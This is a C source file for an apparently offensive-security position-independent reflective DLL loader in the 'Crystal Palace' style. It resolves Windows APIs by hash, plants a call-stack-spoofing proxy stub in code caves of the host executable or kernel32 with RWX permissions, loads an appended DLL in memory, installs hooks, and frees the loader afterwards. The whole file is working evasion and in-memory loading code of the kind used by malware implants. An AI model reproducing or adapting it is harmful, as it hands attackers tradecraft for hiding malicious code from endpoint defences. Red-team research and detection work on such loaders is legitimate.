/*
 * Copyright 2025 Raphael Mudge, Adversary Fan Fiction Writers Guild
 *
 * Redistribution and use in source and binary forms, with or without modification, are
 * permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this list of
 * conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice, this list of
 * conditions and the following disclaimer in the documentation and/or other materials provided
 * with the distribution.
 *
 * 3. Neither the name of the copyright holder nor the names of its contributors may be used to
 * endorse or promote products derived from this software without specific prior written
 * permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
 * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/* function prototypes */
void SetupProxy(char *, char *);

/* this is the REAL entry point to this whole mess and it needs to go first! */
__attribute__((noinline, no_reorder)) void go() {
	/*
	 * Note, we're using MingW64 intrinsics to get our frame ptr and return address.
	 * I'm peeking the value of the frame ptr here to go one frame up.
	 */
	SetupProxy(__builtin_return_address(0), *(char **)__builtin_frame_address(0));
}

/*
 * Our includes
 */
#include "loaderdefs.h"
#include "loader.h"
#include "picorun.h"
#include "resolve_eat.h"
#include "proxy.h"

/* these might help */
#define memset(x, y, z) __stosb((unsigned char *)x, y, z);
#define memcpy(x, y, z) __movsb((unsigned char *)x, (unsigned char *)y, z);

/* build a table of functions we need/want */
#define WIN32_FUNC( x ) __typeof__( x ) * x

typedef struct {
	WIN32_FUNC(LoadLibraryA);	/* IMPORTFUNCS */
	WIN32_FUNC(GetProcAddress);	/* IMPORTFUNCS */
	WIN32_FUNC(VirtualAlloc);
	WIN32_FUNC(VirtualProtect);
	PROXY      proxy;		/* our proxy PIC, we can use it here too */
	ULONG_PTR  parentReturnAddress;	/* parent return address to pass on */
	ULONG_PTR  parentFramePointer;	/* parent frame pointer to pass on */
	WIN32_FUNC(GetModuleHandleA);
} WIN32FUNCS;

/*
 * Need other hashes?
 *
 * https://github.com/ihack4falafel/ROR13HashGenerator
 */
#define KERNEL32DLL_HASH	  0x6A4ABC5B

#define LOADLIBRARYA_HASH	  0xEC0E4E8E
#define GETPROCADDRESS_HASH	  0x7C0DFCAA
#define VIRTUALALLOC_HASH	  0x91AFCA54
#define VIRTUALPROTECT_HASH       0x7946C61B
#define GETMODULEHANDLEA_HASH     0xD3324904

void findNeededFunctions(WIN32FUNCS * funcs) {
	char * hModule = findModuleByHash(KERNEL32DLL_HASH);

	funcs->LoadLibraryA     = (__typeof__(LoadLibraryA) *)    findFunctionByHash(hModule, LOADLIBRARYA_HASH);
	funcs->GetProcAddress   = (__typeof__(GetProcAddress) *)  findFunctionByHash(hModule, GETPROCADDRESS_HASH);
 	funcs->VirtualAlloc     = (__typeof__(VirtualAlloc) *)    findFunctionByHash(hModule, VIRTUALALLOC_HASH);
	funcs->VirtualProtect   = (__typeof__(VirtualProtect) *)  findFunctionByHash(hModule, VIRTUALPROTECT_HASH);
	funcs->GetModuleHandleA = (__typeof__(GetModuleHandleA) *)findFunctionByHash(hModule, GETMODULEHANDLEA_HASH);
}

/*
 * This is the Crystal Palace convention for getting ahold of data linked with this loader.
 */
#ifdef WIN_X86
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)WIN_GET_CALLER(); }
#define GETRESOURCE(x) PTR_OFFSET(caller(), (ULONG_PTR)x + 5)
#else
#define GETRESOURCE(x) (char *)&x
#endif

char rPROXYPIC[0]    __attribute__((section("my_proxy")));
char rHOOKOBJECT[0]  __attribute__((section("my_hooks")));
char rDLLDATA[0]     __attribute__((section("my_data")));
char rFREEOBJECT[0]  __attribute__((section("my_free")));

typedef struct {
        int   length;
        char  value[];
} _RESOURCE;

/*
 * Get the start address of our PIC DLL loader.
 */
char * getStart() {
#ifdef WIN_X86
	return PTR_OFFSET(caller(), (ULONG_PTR)go + 5);
#else
	return (char *)go;
#endif
}

/*
 * Our PICO runners.
 */
typedef struct {
	char * srcData;
	char * dstCode;
	char * dstData;
} PICOARGS;

/* load our PICO based on the args, return the entry point--so we can call it */
PICOMAIN_FUNC PicoGo(WIN32FUNCS * funcs, PICOARGS * pico) {
	PicoLoad((IMPORTFUNCS *)funcs, pico->srcData, pico->dstCode, pico->dstData);
	return PicoEntryPoint(pico->srcData, pico->dstCode);
}

typedef void (*PICOHOOK_FUNC_1)(IMPORTFUNCS * funcs);
typedef void (*PICOMAIN_FUNC_3)(char * loader, char * dllEntry, char * dllBase);

/*
 * How we're going to layout our memory to keep our DLL and PICOs in the same space.
 */
typedef struct {
	char freeandrun_code[4096];
	char hook_code[4096];
	char hook_data[4096];
	char freeandrun_data[4096];
	char dllbase[0];
} LAYOUT;

void ReflectiveLoader(WIN32FUNCS * funcs) {
	/* find our DLL appended to this PIC */
	char * src = GETRESOURCE(rDLLDATA);

	/* parse our DLL! */
	DLLDATA  data;
	ParseDLL(src, &data);

	/*
	 * allocate memory for our DLL and the other stuff within our layout.
	 *
	 * note that we're using our previously installed proxy PIC for this. :)
	 * Our hook module (setup next) will take care of proxying after this.
	 */
	PROXYCALL call;
	call.function = (ULONG_PTR)funcs->VirtualAlloc;
	call.argc     = 4;
	call.args[0]  = (ULONG_PTR)NULL;
	call.args[1]  = (ULONG_PTR)(sizeof(LAYOUT) + SizeOfDLL(&data));
	call.args[2]  = (ULONG_PTR)(MEM_RESERVE | MEM_COMMIT);
	call.args[3]  = (ULONG_PTR)PAGE_EXECUTE_READWRITE;

	call.spoofme.frameaddr = funcs->parentFramePointer;
	call.spoofme.retaddr   = funcs->parentReturnAddress;

	LAYOUT * dst;
	dst = (LAYOUT *)funcs->proxy(&call);

	/* Before we go ANY further, let's run our COFF to setup our hooks */
	PICOARGS hook;
	hook.srcData = GETRESOURCE(rHOOKOBJECT);
	hook.dstCode = dst->hook_code;
	hook.dstData = dst->hook_data;

	((PICOHOOK_FUNC_1)PicoGo(funcs, &hook)) ((IMPORTFUNCS *)funcs);

	/* load the damned thing */
	LoadDLL(&data, src, dst->dllbase);

	/* process the imports */
	ProcessImports((IMPORTFUNCS *)funcs, &data, dst->dllbase);

	/* pass execution on to our free COFF which will free() this module out of memory */
	PICOARGS runme;
	runme.srcData = GETRESOURCE(rFREEOBJECT);
	runme.dstCode = dst->freeandrun_code;
	runme.dstData = dst->freeandrun_data;

	((PICOMAIN_FUNC_3)PicoGo(funcs, &runme)) (getStart(), (char *)EntryPoint(&data, dst->dllbase), dst->dllbase);
}


#define FLAG(x, y) ( ((x) & (y)) == (y) )
#define ROUND_DOWN_PAGE(x) (char *)((ULONG_PTR)x - ((ULONG_PTR)x % 0x1000))

/*
 * find slack space at the end of an eXecutable section that can fit our payload.
 */
char * findCodeCave(char * dllBase, int length) {
	DLLDATA                 data;
	DWORD                   numberOfSections;
	IMAGE_SECTION_HEADER  * sectionHdr       = NULL;
	IMAGE_SECTION_HEADER  * sectionNxt       = NULL;

	/* parse our DLL! */
	ParseDLL(dllBase, &data);

	/* loop through our sections */
	numberOfSections = data.NtHeaders->FileHeader.NumberOfSections;
	sectionHdr       = (IMAGE_SECTION_HEADER *)PTR_OFFSET(data.OptionalHeader, data.NtHeaders->FileHeader.SizeOfOptionalHeader);
	for (int x = 0; (x + 1) < numberOfSections; x++) {
		/* look for our eXecutable section, there-in lives our... code cave */
		if (FLAG(sectionHdr->Characteristics, IMAGE_SCN_MEM_EXECUTE)) {
			/* let's look at our next section, we need it to get the right size of the code cave */
			sectionNxt      = sectionHdr + 1;

			/* calculate the size, based on section headers */
			DWORD size      = sectionNxt->VirtualAddress - sectionHdr->VirtualAddress;

			/* calculate the size of our code cave */
			DWORD cavesize  = size - sectionHdr->SizeOfRawData;

			/* if we fit, return it */
			if (length < cavesize)
				return dllBase + (sectionNxt->VirtualAddress - cavesize);
		}

		/* advance to our next section */
		sectionHdr++;
	}

	return NULL;
}

/*
 * Install our proxy PIC somewhere in memory, ideally in image memory (e.g., backed by a module on disk). This is
 * a risky and unmasked operation... but once this is done, we've got a nice call stack munging proxy that can run
 * whatever we give to it. And, that's pretty cool.
 */
void SetupProxy(char * retaddr, char * frameaddr) {
	WIN32FUNCS   funcs;
	_RESOURCE  * src;
	DWORD        oldProt;
	char       * hModule;

	src = (_RESOURCE *)GETRESOURCE(rPROXYPIC);

	/*
	 * Keep track of the return address and frame pointer from the context that called our loader. These are
	 * the values we are going to "spoof" later on.
	 *
	 * Note, I've opted to detect when the framepointer is NULL, and use that as a clue that our execution
	 * started from a context without a good frame behind us (e.g., CreateRemoteThread). In these situations,
	 * if we spam the return address without a valid frame pointer--we're going to get a stack unwinding that's
	 * less predictable.
	 *
	 * By opting to NULL the return address when the frame pointer is null, my goal is to, at least, get a
	 * truncated call stack in these situations.
	 */
	if (frameaddr == 0) {
		funcs.parentReturnAddress = (ULONG_PTR)0;
		funcs.parentFramePointer  = (ULONG_PTR)0;
	}
	else {
		funcs.parentReturnAddress = (ULONG_PTR)retaddr;
		funcs.parentFramePointer  = (ULONG_PTR)frameaddr;
	}

	/* resolve the functions we'll need */
	findNeededFunctions(&funcs);

	/* (1) we're going to search for a code cave in... our executable */
	hModule     = (char *)funcs.GetModuleHandleA(NULL);
	funcs.proxy = (PROXY)findCodeCave(hModule, src->length);

	/* (2) if we can't find a code cave in our executable, let's find one elsewhere. How about kernel32?
	 * And, a good place to note: bad idea on x86. There are reserved sections between sections breaking
	 * my code cave calculation algorithm. You'll end up in memory you don't want to be in. */
#ifdef WIN_X64
	if (funcs.proxy == NULL) {
		hModule = (char *)findModuleByHash(KERNEL32DLL_HASH);
		funcs.proxy = (PROXY)findCodeCave(hModule, src->length);
	}
#endif
	/* (3) if there's no space in our executable, then just do a VirtualAlloc--life goes on */
	if (funcs.proxy == NULL)
		funcs.proxy = (PROXY)funcs.VirtualAlloc( NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE );

	/* change the permissions of our PIC to RWX */
	funcs.VirtualProtect(ROUND_DOWN_PAGE(funcs.proxy), 0x1000, PAGE_EXECUTE_READWRITE, &oldProt);

	/* copy our proxy PIC over */
	memcpy(funcs.proxy, src->value, src->length);

	/* And, that's it... continue the process */
	ReflectiveLoader(&funcs);
}
